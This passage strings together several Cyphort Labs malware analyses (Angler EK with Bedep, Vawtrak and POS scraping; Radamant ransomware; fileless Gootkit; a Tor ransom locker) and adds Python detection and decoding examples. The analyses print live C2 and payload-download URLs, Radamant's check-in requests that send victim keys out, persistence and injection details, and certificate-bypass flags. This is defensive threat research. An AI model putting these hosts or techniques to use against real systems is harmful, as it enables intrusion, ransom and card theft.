  • Venik DLL: MD5 a6ec0fbe1ad821a3fb527f39e180e378, packer RLPack, filename {random}
  • Flash Exploit: MD5 b9a5a00e134fe0df217c01145319b1cb, packer DoSWF, filename ad.swf

 

 

Credits to Alex Burt for his help in the discovery of this infection.

 

The post Infected Korean Website Installs Banking Malware appeared first on Cyphort.

Psychcentral.com infected with Angler EK: Installs bedep, vawtrak and POS malware


On October 26, 2015, Cyphort Labs discovered that psychcentral[.]com had been compromised and was infecting visitors via drive-by-download malware. We contacted psychcentral about this infection as soon as we discovered it. As of October 29, their technical team had identified the problem and addressed the issue. Psychcentral[.]com is a leading independent mental health social network. It receives about 163,846 unique visitors per day.

The site was infected with an iframe injector that redirects to Angler EK. It uses a Flash exploit that targets a recent vulnerability in Adobe Flash. We found it installing Bedep and Vawtrak. Bedep is the notorious ad-fraud malware, and Vawtrak is a banking trojan following in the footsteps of Zeus. We have seen Angler using Bedep as its payload, but adding Vawtrak to its arsenal is something we had not seen until recently. Moreover, the Vawtrak sample we obtained downloads a new memory-scraping malware that scans for credit card data in memory. This is typical of Point of Sale malware like the ones that affected Target stores.

 

Infection Chain


 

 

The iframe injection originates from an ad server script that uses Open AdStream (OAS). The script makes a request to oascentral[.]spineuniverse[.]com, which leads to a function OAS_RICH() responsible for injecting iframes into the web page.

Figure: Ad server script injecting the iframe

 

 

The webpage finally leads to Angler EK landing page on margueriteyellow[.]bitcoininvesting[.]net. It uses a flash exploit that targets the following vulnerability:

  • CVE-2015-5560, Adobe Flash Player versions prior to 18.0.0.232 on Windows and OS X.

The vulnerability was already patched in the 18.0.0.232 Flash update.

Figure: Network activity during infection
 

 

Payloads

We were able to obtain 3 executable payloads from this infection:

  • a2ee0c22d0cbdaa1c8de45c4a487b96a – Bedep
  • 28639b2c93a24ed6d178f3098ca23f2e – Vawtrak
  • a1d1ba04f3cb2cc6372b5986fadb1b9f – POS malware

 

Bedep

As we have seen in the past, Bedep’s function is to execute ad-fraud campaigns. It usually arrives encrypted over the network to protect itself against traditional IDS/IPS solutions. It resides on the system as a DLL file, usually in the %PROGRAMDATA% folder. It also creates a folder named after the machine GUID and drops itself there.

 

Vawtrak

Vawtrak (aka Neverquest) is a rising star in the field of financial trojans. It was first discovered in the wild in 2013. It arrives by several methods: usually via exploit kits, as an attachment to spam email, or downloaded by macro malware embedded in Microsoft Office documents and spreadsheets.

It employs functions similar to those used by Zeus, such as webinjects to collect confidential banking information and API hooking to intercept browser traffic. It also downloads an encrypted configuration which contains the URLs it targets for injection.

The configuration also contains a list of download URLs that point to its additional modules. The sample we obtained has the following download links in its config:

Figure: Vawtrak config file snapshot

 

Samples downloaded from 176[.]99[.]11[.]154 are its additional modules. One interesting URL is http://46[.]30[.]41[.]16/files/970.exe, a downloader for a new RAM-scraping malware akin to the ones used in typical POS malware, as described in a Cyphort Special Report.

 

Vawtrak resides on the system as a DLL file in %PROGRAMDATA%, using random names such as:

  • C:\ProgramData\Nuxbu\Zuzhot.dll

It creates a Run key that uses regsvr32.exe to execute the DLL, e.g.:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    • Value:{FFCF9B6F-7C01-4D05-9D5E-7F8BDD6E0481}
    • Data:regsvr32.exe “C:\ProgramData\Nuxbu\Zuzhot.dll”

It downloads its configuration file from:

  • http://ninthclub.com/Work/new/index.php

 

 

RAM scraping malware

Vawtrak downloads and executes “970.exe”, which then downloads a DLL component from 91.234.34.44 via TCP port 30970. It saves this as follows:

  • %ALLUSERS%\Application Data\{random}.dll

 

It then downloads an additional file via HTTP GET from:

  • 50.7.143.61/a_p/a_970.exe

And saves it as:

  • %ALLUSERS%\Application Data\taskhost.exe

 

taskhost.exe enumerates every running process and checks its memory for credit card information. If it finds such a process, it creates a new thread that checks for Track 1 and Track 2 data:

 

Figure: Process enumeration to scrape credit card data

 

 

It specifically checks for card numbers that start with 3, 4, 5, or 6, which covers cards like AMEX, Visa, MasterCard, Diners Club, Discover, etc.

Figure: Track 1 and Track 2 checking

 

 

This infection shows how cybercriminals use multiple infection methods. Exploit kits are usually packaged to target multiple vulnerable software products to increase their coverage. There are reports that Angler generates $34 million annually from ransomware alone. In this infection we see that the group is after money; we are not sure how much they are raking in. Bedep and Vawtrak target consumers, while the RAM-scraping malware targets POS systems. One thing is for sure: the group behind this is looking to cash in.

Special thanks to Alex Burt and the rest of Cyphort Labs for their help in discovering and analyzing this infection.

 

The post Psychcentral.com infected with Angler EK: Installs bedep, vawtrak and POS malware appeared first on Cyphort.

Radamant Ransomware distributed via Rig EK


A new ransomware called Radamant was discovered in early December 2015. On December 31, we found compromised websites redirecting to the Rig Exploit Kit and downloading this ransomware. The following sites had been infected:

  • www.yatra.com
  • www.herbeauty.co

Figure: Infection Chain on yatra.com

Figure: Infection Chain on herbeauty.co

On each affected page, malicious HTML code was injected at the end of the page. The code loads a malicious Flash file that redirects to the Rig EK landing page.

Figure: Injected Code

As of this writing the said websites are now free from infection.

Flash Exploit

The Rig EK on both sites uses the same flash exploit and also delivers the same payload. The flash exploit targets the following vulnerability:

  • CVE-2015-5560

This is an old exploit which affects versions 18.0.0.209 and below. It was patched on August 15, 2015 via Adobe Flash Player update 18.0.0.232. After exploitation, it downloads its payload.

 

Radamant Ransomware

This is a new breed of ransomware that encrypts files using AES-256. Bleepingcomputer.com provides excellent coverage of this ransomware. The malware was also found to be leased as a kit on private malicious sites: it costs $1,000 to rent for one month, or potential buyers can test it for 48 hours for $100 USD.

Source: http://www.bleepingcomputer.com/news/security/radamant-ransomware-kit-for-sale-on-exploit-and-malware-sites/

As early as December 14, people had been complaining on the bleepingcomputer forum that their files were encrypted and renamed with a .RDM or .RRK extension. This malware scans all files that match certain extensions and encrypts each of them with a unique AES-256 key. The generated AES-256 key is then encrypted with a master key and embedded into the target file.

 

Network Connections:

The malware first issues a POST request to its C&C server at http://cutenaskare.com/domains.php to obtain possible domain(s):

    POST http://cutenaskare.com/domains.php
    Server Reply: [7:cutenaskare.com]

Then it POSTs to http://cutenaskare.com/API.php with its ID and IP address to check whether it is already registered with the server:

    POST http://cutenaskare.com/API.php  id={machine fingerprint}&ip={victim’s IP address}
    Server Reply: [0:unknownID][6:{IP region e.g., RU}]

If the victim is new, the server replies with [0:unknownID], which instructs the bot to register and post additional system information:

    POST http://cutenaskare.com/API.php  id={machine fingerprint}&apt=0&os={OS version}&ip={victim’s IP address}&bits={32 or 64 bit}&discs={Drive Letters}&pub={public key}&prv={private key}
    Server Reply: [r:good]

The server sends its public key and the malware POSTs to:

    POST http://cutenaskare.com/mask.php

The server replies with a list of extensions to encrypt, which also triggers the start of encryption. After the malware finishes encrypting files, it shows the following page informing the user that their files have been encrypted and instructing the victim to pay 0.5 Bitcoin (approx. 220 USD).
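The check-in sequence just described can be matched in proxy or sandbox HTTP records. The following is an added example, not the post’s or the malware’s code: it parses the bracketed replies and reports clients that walk the sequence domains.php, then API.php with id/ip, then API.php again with the pub/prv registration, then mask.php. The record format and the client addresses are constructed; the URLs and reply strings follow the post.

```python
"""Detect the Radamant check-in sequence described above in HTTP transaction records."""
import re
from urllib.parse import urlsplit, parse_qs

# Replies come back as '[tag:value]' groups, e.g. '[0:unknownID][6:RU]'.
REPLY_FIELD = re.compile(r"\[([^:\]]+):([^\]]*)\]")

# Constructed transaction records (client, method, url, body, reply); the URLs and
# reply strings follow the post, the client addresses and field values are made up.
SAMPLE_TRANSACTIONS = [
    {"client": "10.0.0.5", "method": "POST", "url": "http://cutenaskare.com/domains.php",
     "body": "", "reply": "[7:cutenaskare.com]"},
    {"client": "10.0.0.5", "method": "POST", "url": "http://cutenaskare.com/API.php",
     "body": "id=9f3c2a1b&ip=203.0.113.7", "reply": "[0:unknownID][6:RU]"},
    {"client": "10.0.0.5", "method": "POST", "url": "http://cutenaskare.com/API.php",
     "body": "id=9f3c2a1b&apt=0&os=6.1&ip=203.0.113.7&bits=32&discs=CD&pub=PUBKEY&prv=PRVKEY",
     "reply": "[r:good]"},
    {"client": "10.0.0.5", "method": "POST", "url": "http://cutenaskare.com/mask.php",
     "body": "", "reply": "doc,xls,jpg"},
    # unrelated client that merely fetched a page named domains.php from an intranet site
    {"client": "10.0.0.9", "method": "GET", "url": "http://intranet.example/domains.php",
     "body": "", "reply": "<html>"},
]


def parse_reply(body):
    """Return the (tag, value) pairs of a '[tag:value]...' C2 reply."""
    return REPLY_FIELD.findall(body)


def classify(tx):
    """Map one transaction to a Radamant check-in stage, or None if it is not one."""
    if tx["method"] != "POST":
        return None
    path = urlsplit(tx["url"]).path.lower()
    params = parse_qs(tx.get("body", ""))
    if path.endswith("/domains.php"):
        return "domains"
    if path.endswith("/api.php") and "id" in params and "ip" in params:
        # the registration POST is the one carrying the pub/prv key parameters
        return "register" if "pub" in params or "prv" in params else "checkin"
    if path.endswith("/mask.php"):
        return "mask"
    return None


def detect_radamant(transactions):
    """Return {client: finding} for clients that reached at least the id/ip check-in."""
    per_client = {}
    for tx in transactions:
        stage = classify(tx)
        if stage is None:
            continue
        f = per_client.setdefault(tx["client"],
                                  {"stages": [], "keys_posted": False, "region": None})
        f["stages"].append(stage)
        if stage == "register":
            f["keys_posted"] = True      # the victim's key pair was sent to the server
        for tag, value in parse_reply(tx.get("reply", "")):
            if tag == "6":               # region code echoed by the server
                f["region"] = value
    # a lone domains.php hit proves little; require the id/ip check-in
    return {c: f for c, f in per_client.items() if "checkin" in f["stages"]}


if __name__ == "__main__":
    for client, finding in detect_radamant(SAMPLE_TRANSACTIONS).items():
        print(client, finding)
```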

Figure: Radamant ransom page

 

Luckily, the malware’s encryption had flaws which allowed Fabian Wosar to recover the encrypted files without paying the ransom.

Fabian’s tool can be downloaded from the following link:

  • emsi.at/DecryptRadamant

The tool has been updated to support the latest known version. It is also evident that the malware authors are not pleased with Fabian, as the latest version contains strings cursing him in its code.

The first version of Radamant was first seen on virustotal.com on Dec 3, 2015, and we have identified 3 versions to date.

 

Version   MD5                                 Mutex Name                              Extension of Encrypted Files
1         e62d58a48f3aca29acd535c3ae4b7ce1    Radamant_v1_Klitschko_number_one        .RDM
2         a40f1a7d3c1db966bbabdeb965697c1b    Radamant_v2_Klitschko_number_one        .RDM
2.1       72c71e4c78af74f4e500f1422a2f9092    \Sessions\1radamantv2_emisoft_fucked    .RRK

 

Indicators of Compromise

 

Mutex Names:

  • Radamant_v1_Klitschko_number_one
  • Radamant_v2_Klitschko_number_one
  • \Sessions\1radamantv2_emisoft_fucked

Install Path:

  • C:\Windows\DirectX.exe

Registry Keys:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    • Value: svchost or DirectX
    • Data: C:\Windows\directx.exe
  • HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
    • Value: svchost or DirectX
    • Data: C:\Windows\directx.exe
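The Run keys quoted across these posts share a few shapes: rundll32/regsvr32 loading a file with an odd extension or from a random top-level folder (Venik), a DLL under %PROGRAMDATA% (Vawtrak), a binary named after a system component dropped directly in C:\Windows (Radamant), and values such as msliveupdate or ncoglsse. The following is an added example, not the posts’ own code, that triages exported Run entries offline against those patterns; the heuristics, the indicator lists and the two benign entries are assumptions, while the four suspicious entries mirror the keys quoted for Venik, Vawtrak, Radamant and the mslives backdoor.

```python
"""Triage autostart Run-key entries for the persistence patterns described in these posts."""
import ntpath
import re
from collections import namedtuple

RunEntry = namedtuple("RunEntry", "key value data")

# Value names and file names reported in the posts above (mslives, winhost, nethost,
# Venik, Vawtrak, Radamant); assembled from the page, not from a threat feed.
KNOWN_VALUES = {"msliveupdate", "microsoft messenger", "ncoglsse", "evtmgr", "svchost", "directx"}
KNOWN_FILES = {"mslives.exe", "winhost.exe", "nethost.exe", "directx.exe"}

LOADERS = {"rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = {"programdata", "%programdata%", "users", "%userprofile%", "%appdata%",
                 "appdata", "temp", "%temp%", "documents and settings"}
KNOWN_ROOT_DIRS = {"windows", "program files", "program files (x86)"}

# Constructed entries: the first four mirror the Run keys quoted in the posts,
# the last two are benign entries made up for contrast.
SAMPLE_ENTRIES = [
    RunEntry(r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "EvtMgr",
             r'c:\windows\system32\rundll32.exe "c:\tqcsv\krxxc.rxk",Start'),
    RunEntry(r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
             "{FFCF9B6F-7C01-4D05-9D5E-7F8BDD6E0481}",
             r'regsvr32.exe "C:\ProgramData\Nuxbu\Zuzhot.dll"'),
    RunEntry(r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "svchost",
             r"C:\Windows\directx.exe"),
    RunEntry(r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "msliveupdate",
             r"%ProgramFilesDir%\Windows NT\Accessories\Microsoft\mslives.exe"),
    RunEntry(r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
             r"%windir%\system32\SecurityHealthSystray.exe"),
    RunEntry(r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "VendorTray",
             r'"C:\Program Files\Vendor\tray.exe" /background'),
]


def split_command(data):
    """Tokenise a Run value roughly as CommandLineToArgv would, honouring double quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', data)]


def target_of(data):
    """Return (loader, path): the file that actually runs and, if rundll32/regsvr32
    loads it, the loader's name (else None)."""
    tokens = split_command(data)
    if not tokens:
        return None, None
    launcher = ntpath.basename(tokens[0]).lower()
    if launcher in LOADERS and len(tokens) > 1:
        return launcher, tokens[1].split(",")[0]       # drop rundll32's ",EntryPoint"
    m = re.match(r'"?(.+?\.exe)', data, re.IGNORECASE)  # unquoted paths may contain spaces
    path = m.group(1) if m else tokens[0]
    return None, path


def triage_run_entry(entry):
    """Return the list of reasons an entry looks suspicious (empty if none)."""
    reasons = []
    loader, target = target_of(entry.data)
    if not target:
        return reasons
    base = ntpath.basename(target).lower()
    parts = [p.lower() for p in re.split(r"[\\/]+", target) if p]   # drive, dirs, file
    if entry.value.lower() in KNOWN_VALUES or base in KNOWN_FILES:
        reasons.append("known_ioc")
    if loader and ntpath.splitext(base)[1] not in (".dll", ".ocx"):
        reasons.append("loader_with_odd_extension")      # e.g. krxxc.rxk via rundll32
    if any(p in USER_WRITABLE for p in parts):
        reasons.append("runs_from_user_writable_dir")    # e.g. C:\ProgramData\Nuxbu\Zuzhot.dll
    if len(parts) == 3 and parts[1] == "windows":
        reasons.append("binary_in_windows_root")         # e.g. C:\Windows\directx.exe
    if loader and len(parts) == 3 and parts[1] not in KNOWN_ROOT_DIRS:
        reasons.append("loader_from_random_root_dir")    # e.g. c:\tqcsv\krxxc.rxk
    return reasons


def suspicious_entries(entries):
    """Return [(value name, reasons)] for every entry with at least one reason."""
    result = []
    for entry in entries:
        reasons = triage_run_entry(entry)
        if reasons:
            result.append((entry.value, reasons))
    return result


if __name__ == "__main__":
    for value, reasons in suspicious_entries(SAMPLE_ENTRIES):
        print(f"{value}: {', '.join(reasons)}")
```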

 

 

The post Radamant Ransomware distributed via Rig EK appeared first on Cyphort.

Angler EK leads to fileless Gootkit


On January 27, 2016, Cyphort Labs discovered a site infected with Angler EK leading to the fileless Gootkit (a.k.a. XswKit) malware. The site was redirecting visitors to the malware through a compromised OpenX ad server injecting a malicious iframe into the page. The iframe leads to Angler EK, which downloads the Bedep ad-fraud malware, which in turn downloads a Gootkit loader.

The loader injects a DLL component found in its body into explorer.exe. The injected DLL then downloads the fileless Gootkit, saves it in the registry as binary data, and loads it in memory only.

Infection Chain

The compromised site belongs to a Romanian broadcasting company, www.tvr.ro. The chain starts with bannere.tvr.ro making an HTTP request to an OpenX ad server, which injects an iframe into the web page. It appears that the OpenX ad server was infected, specifically the file /openx/www/delivery/ajs.php. In previous years there have been reports of vulnerabilities in the OpenX software that allow an attacker remote code execution and code injection. We believe that is likely the case here, but we are not sure whether this is a new vulnerability or an old one.

first_chain

 

The iframe leads to Angler EK, which uses a Flash exploit for CVE-2015-5560. The Flash exploit downloads the Bedep ad-fraud malware, which downloads the Gootkit loader.

(Figure: full infection chain)

Gootkit Loader

This executable is saved in the %windir% folder with a random numeric filename, e.g. 2144874235-50823412.exe. It is a packed executable with most of the packed data in its .rsrc section. After unpacking, it unwraps a DLL component found in its .data section and injects it into the explorer.exe process.

The DLL is unpacked with a custom decryption algorithm. After unpacking, the loader searches for the explorer.exe process and injects the DLL. It has two injection methods: CreateRemoteThread, or hijacking the target's main thread with the GetThreadContext/SetThreadContext APIs. It then terminates itself, so on a live system only the injected explorer.exe remains to be found.

(Figure: process injection routine)

Injected DLL

The injected DLL is the main malware routine. Its purpose is to download additional malware from a set of domains and save it as binary data in the registry. It first checks its execution environment, which it also uses to initialize its variables. It also sets an environment variable "vendor_id" with the value "unstable_2380"; "unstable" may indicate that this build is still under development. It then creates five threads, each with a different task.

(Figure: thread creation in the injected DLL)

The first two threads are responsible for downloading the fileless malware, while the third and fourth threads handle malware updates. The fifth thread is a self-termination switch: it is triggered by the presence of uqjckeguhl.tmp in the %TEMP% folder, which makes that file name a cheap, if brittle, vaccine on a workstation.

First & Second Threads

The first thread is responsible for injecting code into the current process. It starts by waiting for an event that the second thread signals. Once that event is signalled, it injects the code downloaded by the second thread into the current process, which in this case is explorer.exe.

(Figure: first thread waiting on the event and injecting)

The second thread connects to the following domains via SSL: 

  • karlsadovnik75[dot]com
  • karlsasyxushee75[dot]com
  • karlsasyn725[dot]com
  • karlsadroch27[dot]com
  • karlsamochux2[dot]com
  • karlsabrero22[dot]com
  • karlsalomun9[dot]com
  • karlsaranu82[dot]com
  • karlsardabale9[dot]com

It uses HttpOpenRequest with dwFlags set to 0x84800300, which includes INTERNET_FLAG_SECURE (0x00800000) and so forces the request over SSL/TLS. The other bits in that value are INTERNET_FLAG_RELOAD (0x80000000), INTERNET_FLAG_NO_CACHE_WRITE (0x04000000), INTERNET_FLAG_NO_UI (0x00000200) and INTERNET_FLAG_PRAGMA_NOCACHE (0x00000100), i.e. no caching and no user-visible dialogs.

(Figure: second thread opening the SSL request)

By using SSL the malware adds a layer of protection to its network traffic. However, the certificates presented by these domains are not trusted. To get around that, it calls InternetQueryOption and InternetSetOption on INTERNET_OPTION_SECURITY_FLAGS so that invalid certificates are ignored. Together these flags disable every server-authentication check WinINet performs, so the connection is encrypted but unauthenticated; the same flag combination is also a handy static indicator for this kind of downloader.

The value returned by InternetQueryOptionA is ORed with 0x7380, which sets the following flags. In effect it ignores untrusted certificates and ignores redirects to HTTPS:

  • SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTPS
  • SECURITY_FLAG_IGNORE_CERT_CN_INVALID
  • SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
  • SECURITY_FLAG_IGNORE_WRONG_USAGE
  • SECURITY_FLAG_IGNORE_UNKNOWN_CA
  • SECURITY_FLAG_IGNORE_REVOCATION

The downloaded data is saved into the registry as follows:

  • HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_0
  • HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_1
  • HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_2
  • HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_3
  • HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_4
  • HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_5
  • HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_6
(Screenshot: binaryImage32_* values under HKCU\Software\AppDataLow)

As shown, the stored data is encrypted and is not directly usable as an executable.

The second thread is also responsible for reading that data back from the registry. It decrypts it with a custom XOR routine and decompresses it with RtlDecompressBuffer (the post does not identify the compression format passed to that API; LZNT1 is the one most commonly used with it).

(Figure: decryption and RtlDecompressBuffer call in the second thread)

After which, it sets an event which triggers the first thread to proceed with process injection. 
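Added example (not Cyphort's or Gootkit's code) of how an analyst can rebuild such a registry-resident payload from a .reg export of HKCU\Software\AppDataLow. It assumes two things the post does not state: that the custom XOR is a single repeating byte, and that RtlDecompressBuffer is called with the LZNT1 format. The .reg text inside the block is constructed; the value names binaryImage32_N are the ones from the analysis above.

```python
"""Rebuild a registry-resident payload like the binaryImage32_N values above.

Added example, not Cyphort's or Gootkit's code. Assumptions the post does not
state: the "custom XOR" is a single repeating byte, and RtlDecompressBuffer is
called with COMPRESSION_FORMAT_LZNT1. The .reg export at the bottom is
constructed for the example.
"""
import re


def parse_reg_hex_values(reg_text):
    """Return {value_name: bytes} for every hex:/hex(3): value in a .reg export.

    Long values are wrapped with a trailing backslash; join those first.
    """
    joined = re.sub(r",\\\r?\n\s*", ",", reg_text)
    values = {}
    for m in re.finditer(r'"([^"]+)"=hex(?:\(3\))?:([0-9a-fA-F,]+)', joined):
        values[m.group(1)] = bytes(int(h, 16) for h in m.group(2).split(",") if h)
    return values


def xor_bytes(data, key):
    """Single-byte XOR (assumed key layout; the real routine is not published)."""
    return bytes(b ^ key for b in data)


def lznt1_decompress(data):
    """Minimal LZNT1 decoder (the format RtlDecompressBuffer is assumed to use)."""
    out = bytearray()
    pos = 0
    while pos + 2 <= len(data):
        hdr = data[pos] | (data[pos + 1] << 8)
        pos += 2
        if hdr == 0:
            break
        chunk_end = pos + (hdr & 0x0FFF) + 1
        if not hdr & 0x8000:          # stored chunk: copy verbatim
            out += data[pos:chunk_end]
            pos = chunk_end
            continue
        chunk_base = len(out)
        while pos < chunk_end:
            flags = data[pos]
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:      # literal byte
                    out.append(data[pos])
                    pos += 1
                    continue
                token = data[pos] | (data[pos + 1] << 8)
                pos += 2
                # Length/displacement split narrows as the chunk fills up.
                p = len(out) - chunk_base - 1
                len_mask, disp_shift = 0x0FFF, 12
                while p >= 0x10:
                    len_mask >>= 1
                    disp_shift -= 1
                    p >>= 1
                length = (token & len_mask) + 3
                disp = (token >> disp_shift) + 1
                for _ in range(length):       # overlapping copy, byte by byte
                    out.append(out[-disp])
    return bytes(out)


def recover_payloads(reg_text, xor_key):
    """XOR then LZNT1 every binaryImage32_N value; flag ones that look like a PE."""
    found = {}
    for name, blob in parse_reg_hex_values(reg_text).items():
        if name.startswith("binaryImage32_"):
            plain = lznt1_decompress(xor_bytes(blob, xor_key))
            found[name] = (plain, plain[:2] == b"MZ")
    return found


# Constructed sample: 12-byte "image" b"MZ\x90\x00" * 3 compressed by hand as
# one LZNT1 chunk (four literals, then a back-reference of length 8 at
# distance 4), then XORed with 0x5A and exported as a wrapped .reg value.
_COMPRESSED = bytes.fromhex("06b0" "10" "4d5a9000" "0530")
SAMPLE_KEY = 0x5A
_enc = [f"{b ^ SAMPLE_KEY:02x}" for b in _COMPRESSED]
SAMPLE_REG = (
    "Windows Registry Editor Version 5.00\r\n\r\n"
    "[HKEY_CURRENT_USER\\Software\\AppDataLow]\r\n"
    '"binaryImage32_0"=hex:' + ",".join(_enc[:5]) + ",\\\r\n  " + ",".join(_enc[5:]) + "\r\n"
)

if __name__ == "__main__":
    for name, (plain, is_pe) in recover_payloads(SAMPLE_REG, SAMPLE_KEY).items():
        print(name, plain, "(MZ header)" if is_pe else "(not a PE)")
```

Against a real export (reg export HKCU\Software\AppDataLow dump.reg) the XOR key is the unknown; because the output of the XOR stage must decompress cleanly and the decompressed data must start with MZ, a single-byte key can be confirmed by trying all 256 values and keeping the one that passes both checks. A wrong key or wrong compression format shows up as an IndexError or garbage from the decoder.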

 

Third and Fourth Thread

The fourth thread downloads a file from the same domains listed above. The exact URL path is {Domain}/rpersists2/%d, where %d is a random number. It checks that the downloaded file starts with the "MZ" header.

(Figure: fourth thread's update download)

The third thread saves the downloaded file in the %Windir% folder under a random numeric filename such as 2144874235-50823412.exe. It also creates a registry entry so that the file runs after every reboot:

  • HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
    • Data: C:\Windows\2144874235-50823412.exe

The Shell value normally holds explorer.exe (or is absent under HKCU), so any other program path there is a strong persistence indicator.

 

File-less Gootkit

Gootkit was first discovered in 2014. It is a banking trojan that initially focused on French banks and later expanded to other European banks, as Proofpoint reported last December.

The version we captured appears to be version 4, as seen in its code:

(Screenshot: version string in the Gootkit binary)

The file is fairly large at 4.86 MB. Source file paths are also visible in the sample, such as:

  • src_iedriver\CabFile.cc
  • src_iedriver\CertGen.cc
  • src_iedriver\node_xz.cpp
  • src_iedriver\socket_watcher.cpp
  • src_iedriver\SpywareJSWrappers.cc
  • src_iedriver\sqlite\node_sqlite3.cc
  • src_iedriver\Threading.cc
  • src_iedriver\VideoRecorder.cc
  • src_iedriver\VmDetection.cc
  • src_iedriver\wincrypt.cc
  • src_iedriver\WindowsRegistry.cc
  • src_iedriver\ProtectedStorage.cc

This gives an idea of the malware's capabilities. For instance, SpywareJSWrappers is likely the spyware module; it exposes functions for stealing information such as SpAddPortRedirection, DownloadFileRight, SpHookHttp, SpTakeScreenshot, SpH

ookRecv, SpHookSend, SpInsertInjection and SpHookKeyboard.

 

Summary

This infection shows how attackers try to hide through fileless malware and SSL traffic. They also used Angler EK to deliver the payload, with its ability to detect AV engines and its encrypted binary download. In recent blogs we have shown how Angler uses Bedep to download additional malware such as POS malware. Bedep is known as an ad-fraud malware with download capabilities; we did not see Bedep installed in the file system as is usually the case, so here it acted only as a downloader. The goal of this infection is to install Gootkit, a very dangerous malware with backdoor and spyware capabilities, while achieving stealth through fileless infection and encrypted network traffic. The Gootkit loader is detected by Cyphort as TROJAN_WALDEC.DC.

Cyphort Labs will continue to monitor this threat and will provide additional details as needed.

As of this writing, the site is clean.

Hashes

136fe64689f3919e1ba46e384ca8bef7 – Gootkit Loader

Special thanks to Alex Burt, Abhijit Mohanta, Sandeep Mandhotra and rest of Cyphort Labs for the discovery and analysis of this infection.

The post Angler EK leads to fileless Gootkit appeared first on Cyphort.


New Family of Ransom Locker Found, Uses TOR Hidden Service


On March 9, 2016, Cyphort Labs discovered an infection on the porn site keng94(dot)com redirecting visitors to an exploit kit and installing a ransom locker. The site redirects users to rg(dot)foldersasap(dot)com, a RIG EK landing page that serves a malicious Flash file and a malicious binary.

(Figure: infection chain and RIG EK landing page)

The binary arrives encrypted over the network and, after decryption, is saved in the %temp% folder. It is a new trojan-downloader, and several references to the string "FA" in its code hint at the name the authors use for this family:

  • ItsMeFA
  • "version_fa"
  • fa 155

It adds an autostart key in the registry and copies itself into the StartMenu folder so that it runs at every start-up. It creates the file C:\Users\Public\Music\Microsoft\Windows\Manifest\torrc. torrc is Tor's configuration file, and its contents show how Tor is being used: this one configures a Tor hidden service reachable on port 1060. Tor is free software for network anonymity.

(Figure: torrc file contents)

After creating the torrc file, it downloads a file from "http://myfiles(dot)pro/uploads/1275859359.Gaga.mp3" and saves it as C:\Users\Public\Music\Microsoft\Windows\Manifest\tor.exe.

This file is actually an executable masquerading as an MP3. When started, it spawns the following process:

  • C:\Users\Public\Music\Microsoft\Windows\Manifest\tor.exe -f torrc

As with any Tor start-up, the usual Tor data files are created:

(Screenshot: files created by tor.exe)

As a hidden service, Tor automatically generates an onion address for the machine (e.g. 43zri2d6x2rruezl.onion) and writes it to a file named 'hostname' in the hidden service directory, next to the private_key file from which that address is derived. The malware uses this Tor hidden service to download its final payload; routing the traffic through Tor hides the attacker's malicious network activity inside the Tor network. A few moments later, the following window covers the entire screen, making the system unusable.

(Screenshot: full-screen lock window)

Since it locked our system, we tried booting into safe mode for further investigation but were unable to. We decided to analyze it offline and used Volatility to analyze the memory image.

Using Volatility to Find the Malware

We obtained the memory dump and listed the process tree with the Volatility command "pstree". sd_app.exe was the last process spawned, and it in turn spawns another instance of tor.exe. This is likely the downloaded app and the one responsible for locking our screen.

(Screenshot: pstree output showing sd_app.exe)

To confirm this, we listed the visible windows with the "wintree" command to identify which process owns the lock screen, and it pointed to the same sd_app.exe.

(Screenshot: wintree output for the locker window)

Next, we identified the full path of the file from its process id with the "cmdline" command.

(Screenshot: cmdline output with the sd_app.exe path)

We dumped the disk and found the following list of added files.

(Screenshot: files created by sd_app.exe)

The .bat file disables the advanced boot options using bcdedit, which explains why we could not boot into safe mode.

(Figure: contents of 1.bat)


In-the-Wild Samples

Using the VirusTotal service, we searched for similar samples and found four related ones. The first sample appeared on February 1, 2016 with very low detection when first submitted. The files are also signed, but the certificates are invalid. The resource section of the binary (its language and locale information) points to Russia or Ukraine.

(Screenshot: VirusTotal hits for the FA downloader)

The sd_app variants are also signed, and two of the files still have no detection.

(Screenshot: VirusTotal results for sd_app)

We also found that the uploaded files contain debug prints and were submitted from Ukraine, which suggests the actors are using VirusTotal to check whether heuristics detect their malware. The first variant uploaded to VT is version 0.01a-154d, as indicated by the following string:

  • WIN32-VS-x32-RELEASE-Feb  1 2016-15:33:48 v.0.01a-154d

The sample we obtained is version 0.02a-155. This strongly suggests the malware is still in an early stage of development.

 

Conclusion

It has been a while since we last saw a new family of ransom locker in the wild, probably because of the success of file-encrypting ransomware such as CryptoLocker, CryptoWall and Locky, and because ransom lockers can be cleaned easily with rescue discs, which made them ineffective for monetization. This discovery, however, is an advancement in ransom locker malware: it uses Tor to communicate with its CnC servers, which adds a layer of anonymity to the attacker's activity. Also, while the attacker holds your machine hostage, the Tor hidden service they created can let them use your system for Bitcoin payments or other malicious activity. As one researcher discovered, there has been a spike in Tor hidden services due to the ongoing Locky ransomware spam campaign. We also believe that the malware is in its early stages of development and that the actors are testing the waters.

Cyphort’s Advanced Threat Detection is able to detect the exploit infection and also detects all the payload files through behavioral detection.

Special thanks to Alex Burt and Cyphort Labs for their help in analysis and discovery of this malware.

IOCs

 Trojan Downloader hashes (FA)

5ed449fc2385896f8616e5cd7bee3f31

3a00058ccaee78805f539f2f6a259e92

d183ed4609e6ad7b00250c50a963db5d

6af38533fc8621128e943488a6f189ed

